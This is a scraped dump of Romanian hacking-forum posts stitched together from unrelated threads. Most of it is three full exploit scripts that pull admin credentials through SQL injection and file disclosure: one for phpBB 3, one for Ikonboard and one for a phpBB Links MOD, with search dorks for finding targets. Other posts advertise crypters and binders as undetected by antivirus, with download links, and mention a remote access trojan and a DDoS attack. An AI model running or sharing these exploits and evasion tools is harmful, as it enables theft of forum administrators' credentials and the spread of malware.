[phpBB 3.0 SQL Injection]

#!/usr/bin/php -q -d short_open_tag=on 
<? 
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n"; 
echo "by rgod [email]rgod@autistici.org[/email]\n"; 
echo "site: http://retrogod.altervista.org\n"; 
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n"; 

/* 
works regardless of php.ini settings 
you need a global moderator account with "simple moderator" role 
*/ 

if ($argc<5) { 
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n"; 
echo "host:      target server (ip/hostname)\n"; 
echo "path:      path to phpbb3\n"; 
echo "user/pass: u need a valid user account with global moderator rights\n"; 
echo "Options:\n"; 
echo "   -T[prefix]   specify a table prefix different from default (phpbb_)\n"; 
echo "   -p[port]:    specify a port other than 80\n"; 
echo "   -P[ip:port]: specify a proxy\n"; 
echo "   -u[number]:  specify a user id other than 2 (admin)\n"; 
echo "   -x:          disclose table prefix through error messages\n"; 
echo "Example:\r\n"; 
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n"; 
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n"; 
die; 
} 

error_reporting(0); 
ini_set("max_execution_time",0); 
ini_set("default_socket_timeout",5); 

function quick_dump($string) 
{ 
  $result='';$exa='';$cont=0; 
  for ($i=0; $i<=strlen($string)-1; $i++) 
  { 
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) 
   {$result.="  .";} 
   else 
   {$result.="  ".$string[$i];} 
   if (strlen(dechex(ord($string[$i])))==2) 
   {$exa.=" ".dechex(ord($string[$i]));} 
   else 
   {$exa.=" 0".dechex(ord($string[$i]));} 
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} 
  } 
 return $exa."\r\n".$result; 
} 
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\'; 
function sendpacketii($packet) 
{ 
  global $proxy, $host, $port, $html, $proxy_regex; 
  if ($proxy=='') { 
    $ock=fsockopen(gethostbyname($host),$port); 
    if (!$ock) { 
      echo 'No response from '.$host.':'.$port; die; 
    } 
  } 
  else { 
   $c = preg_match($proxy_regex,$proxy); 
    if (!$c) { 
      echo 'Not a valid proxy...';die; 
    } 
    $parts=explode(':',$proxy); 
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; 
    $ock=fsockopen($parts[0],$parts[1]); 
    if (!$ock) { 
      echo 'No response from proxy...';die; 
   } 
  } 
  fputs($ock,$packet); 
  if ($proxy=='') { 
    $html=''; 
    while (!feof($ock)) { 
      $html.=fgets($ock); 
    } 
  } 
  else { 
    $html=''; 
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { 
      $html.=fread($ock,1); 
    } 
  } 
  fclose($ock); 
  #debug 
  #echo "\r\n".$html; 
} 

$host=$argv[1]; 
$path=$argv[2]; 
$user=$argv[3]; 
$pass=$argv[4]; 
$port=80; 
$prefix="PHPBB_"; 
$user_id="2";//admin 
$discl=0; 
$proxy=""; 
for ($i=3; $i<=$argc-1; $i++){ 
$temp=$argv[$i][0].$argv[$i][1]; 
if ($temp=="-p") 
{ 
  $port=str_replace("-p","",$argv[$i]); 
} 
if ($temp=="-P") 
{ 
  $proxy=str_replace("-P","",$argv[$i]); 
} 
if ($temp=="-T") 
{ 
  $prefix=str_replace("-T","",$argv[$i]); 
} 
if ($temp=="-u") 
{ 
  $user_id=str_replace("-u","",$argv[$i]); 
} 
if ($temp=="-x") 
{ 
  $discl=1; 
} 
} 

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} 
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} 

$data="username=".urlencode($user); 
$data.="&password=".urlencode($pass); 
$data.="&redirect=index.php"; 
$data.="&login=Login"; 
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n"; 
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n"; 
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; 
$packet.="Accept-Encoding: text/plain\r\n"; 
$packet.="Host: ".$host."\r\n"; 
$packet.="Content-Length: ".strlen($data)."\r\n"; 
$packet.="Connection: Close\r\n\r\n"; 
$packet.=$data; 
sendpacketii($packet); 
$cookie=""; 
$temp=explode("Set-Cookie: ",$html); 
for ($i=1; $i<=count($temp)-1; $i++) 
{ 
 $temp2=explode(" ",$temp[$i]); 
 $cookie.=" ".$temp2[0]; 
} 
if (eregi("_u=1;",$cookie)) 
{ 
//echo $html."\n";//debug 
//die("Unable to login..."); 
} 
echo "cookie -> ".$cookie."\r\n"; 
if ($discl) 
{ 
$sql="'suntzuuuuu"; 
echo "sql -> ".$sql."\n"; 
$sql=urlencode(strtoupper($sql)); 
$data="username="; 
$data.="&icq="; 
$data.="&email="; 
$data.="&aim="; 
$data.="&joined_select=lt"; 
$data.="&joined="; 
$data.="&yahoo="; 
$data.="&active_select=lt"; 
$data.="&active="; 
$data.="&msn="; 
$data.="&count_select=eq"; 
$data.="&count="; 
$data.="&jabber="; 
$data.="&sk=c"; 
$data.="&sd=a"; 
$data.="&ip=".$sql; 
$data.="&search_group_id=0"; 
$data.="&submit=Search"; 
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; 
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; 
$packet.="Host: ".$host."\r\n"; 
$packet.="Content-Length: ".strlen($data)."\r\n"; 
$packet.="Connection: Close\r\n"; 
$packet.="Cookie: ".$cookie." \r\n\r\n"; 
$packet.=$data; 
sendpacketii($packet); 
if (strstr($html,"You have an error in your SQL syntax")) 
{ 
$temp=explode("posts",$html); 
$temp2=explode(" ",$temp[0]); 
$prefix=strtoupper($temp2[count($temp2)-1]); 
echo "prefix -> ".$prefix."\n";sleep(2); 
} 
} 

$md5s[0]=0;//null 
$md5s=array_merge($md5s,range(48,57)); //numbers 
$md5s=array_merge($md5s,range(97,102));//a-f letters 
//print_r(array_values($md5s)); 
$j=1;$password=""; 
while (!strstr($password,chr(0))) 
{ 
for ($i=0; $i<=255; $i++) 
{ 
if (in_array($i,$md5s)) 
{ 
  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; 
  echo "sql -> ".$sql."\n"; 
  $sql=urlencode(strtoupper($sql)); 
  $data="username="; 
  $data.="&icq="; 
  $data.="&email="; 
  $data.="&aim="; 
  $data.="&joined_select=lt"; 
  $data.="&joined="; 
  $data.="&yahoo="; 
  $data.="&active_select=lt"; 
  $data.="&active="; 
  $data.="&msn="; 
  $data.="&count_select=eq"; 
  $data.="&count="; 
  $data.="&jabber="; 
  $data.="&sk=c"; 
  $data.="&sd=a"; 
  $data.="&ip=".$sql; 
  $data.="&search_group_id=0"; 
  $data.="&submit=Search"; 
  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; 
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; 
  $packet.="Host: ".$host."\r\n"; 
  $packet.="Content-Length: ".strlen($data)."\r\n"; 
  $packet.="Connection: Close\r\n"; 
  $packet.="Cookie: ".$cookie." \r\n\r\n"; 
  $packet.=$data; 
  sendpacketii($packet); 
  if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;} 
  } 
  if ($i==255) {die("Exploit failed...");} 
} 
$j++; 
} 

$j=1;$admin=""; 
while (!strstr($admin,chr(0))) 
{ 
for ($i=0; $i<=255; $i++) 
{ 
  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; 
  echo "sql -> ".$sql."\n"; 
  $sql=urlencode(strtoupper($sql)); 
  $data="username="; 
  $data.="&icq="; 
  $data.="&email="; 
  $data.="&aim="; 
  $data.="&joined_select=lt"; 
  $data.="&joined="; 
  $data.="&yahoo="; 
  $data.="&active_select=lt"; 
  $data.="&active="; 
  $data.="&msn="; 
  $data.="&count_select=eq"; 
  $data.="&count="; 
  $data.="&jabber="; 
  $data.="&sk=c"; 
  $data.="&sd=a"; 
  $data.="&ip=".$sql; 
  $data.="&search_group_id=0"; 
  $data.="&submit=Search"; 
  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; 
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; 
  $packet.="Host: ".$host."\r\n"; 
  $packet.="Content-Length: ".strlen($data)."\r\n"; 
  $packet.="Connection: Close\r\n"; 
  $packet.="Cookie: ".$cookie." \r\n\r\n"; 
  $packet.=$data; 
  sendpacketii($packet); 
  if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;} 
  } 
  if ($i==255) {die("Exploit failed...");} 
$j++; 
} 
echo "--------------------------------------------------------------------\r\n"; 
echo "admin          -> ".$admin."\r\n"; 
echo "password (md5) -> ".$password."\r\n"; 
echo "--------------------------------------------------------------------\r\n"; 

function is_hash($hash) 
{ 
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} 
 else {return false;} 
} 

if (is_hash($password)) {echo "Exploit succeeded...";} 
else {echo "Exploit failed...";} 
?>

[Gagici .. programabile]

scrieti "tits"

[Mass Message - Made by Nemessis]

Mai sunt si mass-urile alea in care iti moare tot neamu. IMPOSIBIL.

Mai sunt si mass-urile alea in care se inchide yahoo. Sa inchida odata yahoo asta.

[Uitati-va pana la capat :))]

http://www.youtube.com/watch?v=jivAOvzTjhM&NR=1

uitati-va aici pana la capat :lol::lol:

[Cumpar cont Ebay valid]

5. Nu se posteaza NIMIC in legatura cu:

- carti de credit

- conturi paypal

- conturi Western Union

- conturi ebay

nu trebuia sa iti zic eu asta...

[Progam facut DE mine ...]

a fost simplu...

trebuia sa pui programul la challenges...

[Progam facut DE mine ...]

adika ce veri sa zici cu asta

ne spui si noua ce program este sau o poza ceva.

[vBulletin Exploit 4 all versions -Private-]

ce face?

"exploit" ddos! pur si simplu pica forumul! desi nu creca ca merge daca ii activat captcha

nu ati citit ce a scris kwe.

[Windows Vista Aero VS Linux Ubuntu Beryl]

vedeti si voi care e diferenta

[Kre@toR]

welcome... tu esti kreator de pe mt nu?

[EXECrypt v1.0 99% UD]

AhnLab-V3	2007.9.1.0	2007.09.03	-
AntiVir	7.4.1.66	2007.09.02	-
Authentium	4.93.8	2007.09.02	-
Avast	4.7.1029.0	2007.09.02	-
AVG	7.5.0.484	2007.09.02	-
CAT-QuickHeal	9.00	2007.09.01	-
ClamAV	0.91.2	2007.09.02	-
DrWeb	4.33	2007.09.03	-
eSafe	7.0.15.0	2007.09.02	-
eTrust-Vet	31.1.5100	2007.08.31	-
Ewido	4.0	2007.09.02	-
FileAdvisor	1	2007.09.03	-
Fortinet	3.11.0.0	2007.09.03	-
F-Prot	4.3.2.48	2007.09.02	-
F-Secure	6.70.13030.0	2007.09.03	-
Ikarus	T3.1.1.12	2007.09.03	-
Kaspersky	4.0.2.24	2007.09.03	-
McAfee	5110	2007.08.31	-
Microsoft	1.2803	2007.09.03	-
NOD32v2	2498	2007.09.03	-
Norman	5.80.02	2007.09.02	-
Panda	9.0.0.4	2007.09.02	-
Prevx1	V2	2007.09.03	-
Rising	19.38.62.00	2007.09.02	-
Sophos	4.21.0	2007.09.02	-
Sunbelt	2.2.907.0	2007.08.31	-
TheHacker	6.1.9.175	2007.09.02	-
VBA32	3.12.2.3	2007.09.01	-
VirusBuster	4.3.26:9	2007.09.02	-
Webwasher-Gateway	6.0.1	2007.09.02	Win32.Malware.gen!88 (suspicious)

Download: http://rapidshare.com/files/53038424/execrypt.rar

[PowerCrypt [Beta1]]

|||MENU|||

Primul buton: ADD/OPEN

Al doilea: DELETE

Al treilea: NEW PROJECT

Al patrulea: ABOUT

Download: http://rapidshare.com/files/52870514/PowerCrypt.rar

[k800i poate lua virusi?]

din cate stiu nu se mai formateaza.

[tequila]

40 si ceva % parca , daca vrei bautura tare ia absinthe sau mai ieftin spirt

absinth menta la inceput si dupaia te arde grav

e tare

[fAzE XCryptor]

Nu stiu!

Nu am folosit acest crypter.

[XSS Cookie Stealing on phpBB]

este activat. da nu inteleg asta '

cred ca trebuie sa fie decat

[fAzE XCryptor]

Download: http://rapidshare.com/files/52723487/XCryptor-fAzE.zip

[ikonboard All Versions Remote Password Disclosure]

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
&help unless $#ARGV == 2;
&help unless $ARGV[0] =~ m/^(.*)\\.(.*)/gi;
&help unless $ARGV[2] =~ m/^\\/(.*)\\//gi;
my $host = $ARGV[0];
my $user = $ARGV[1];
my $path = $ARGV[2];
our $lwp = new LWP::UserAgent;
$lwp -> agent(\"Ik0nb04d w4r3z by n0stur. ph33r bitchez!\");
our $get = $lwp -> get(\"http://\".$host.\"/cgi-bin\".$path.\"search.cgi?action=display\", \'Cookie\' => \"amembernamecookie=../members/\".$user.\".cgi%00;\") || print \"\\n[-] $!\\n\";

if($get->content() =~ /$user/){ print \"\\n[*] Vulnerable\\n\";} else { &end; }

$get->content() =~ /forum=(\\w+)&topic=(\\w+)/;
print \"\\n[+] Username: \".$1.\"\\n\";
print \"[+] Password: \".$2.\"\\n\";
print \"Service provided by nostur. njoy, bitchez!\\n\";
sub help {
print qq^
Ikonboard all versions remote password disclosure
Found by: anonymous...
Code by: nostur
->Usage: $0 <host> <user> <path_to_ikonboard_in_cgibin>
^;
die(\"\\nNot enough parameters, check the code...\\n\");
}
sub end { die(\"\\n[-]Not Vulnerable\\n\"); }

# notsec.com

[help!?]

cumva ai sters programul cu care ai pus iconitza de mp3?

[phpBB Links MOD 1.2.2 Remote SQL Injection]

fuck..eu cu sysghost am mai avut privat bugu asta

e public de mai mult timp dar nu l-am pus eu aici

imi cer scuze pt offtopic.

[Adrenaline Binder [English Translation]]

AhnLab-V3 2007.7.14.0 2007.07.17 no virus found

AntiVir 7.4.0.42 2007.07.17 HEUR/Malware

Authentium 4.93.8 2007.07.17 no virus found

Avast 4.7.997.0 2007.07.17 no virus found

AVG 7.5.0.476 2007.07.16 Dropper.Generic.NDH

BitDefender 7.2 2007.07.17 no virus found

CAT-QuickHeal 9.00 2007.07.17 no virus found

ClamAV devel-20070416 2007.07.17 no virus found

DrWeb 4.33 2007.07.17 no virus found

eSafe 7.0.15.0 2007.07.17 no virus found

eTrust-Vet 30.8.3789 2007.07.17 no virus found

Ewido 4.0 2007.07.17 no virus found

FileAdvisor 1 2007.07.17 no virus found

Fortinet 2.91.0.0 2007.07.17 no virus found

F-Prot 4.3.2.48 2007.07.17 no virus found

Ikarus T3.1.1.8 2007.07.17 no virus found

Kaspersky 4.0.2.24 2007.07.17 no virus found

McAfee 5076 2007.07.17 MultiDropper-JD

Microsoft 1.2704 2007.07.17 no virus found

NOD32v2 2403 2007.07.17 no virus found

Norman 5.80.02 2007.07.17 no virus found

Panda 9.0.0.4 2007.07.17 Suspicious file

Sophos 4.19.0 2007.07.16 no virus found

Sunbelt 2.2.907.0 2007.07.16 no virus found

Symantec 10 2007.07.17 no virus found

TheHacker 6.1.7.148 2007.07.16 no virus found

VBA32 3.12.2 2007.07.16 no virus found

VirusBuster 4.3.23:9 2007.07.17 no virus found

Webwasher-Gateway 6.0.1 2007.07.17 Heuristic.Malware

Download: http://rapidshare.com/files/52421719/Adrenaline_Binder.rar

[Cryptic v1.5]

Poison Ivy 2.3.0 este scanat mai sus dupa ce a fost cryptat.

Download: http://rapidshare.com/files/52420486/Cryptic_v1.5.rar

[phpBB Links MOD 1.2.2 Remote SQL Injection]

#!/usr/bin/perl

print q{

phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

Bug discovered by Don
Dork: allinurl:links.php?t=search
   or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
} 

[Sorinel se intoarce !]

Sp[L]o1T: ai casca de cosmonaut ?

aici imi place )

[Pt toti piromanii :D]

damn ))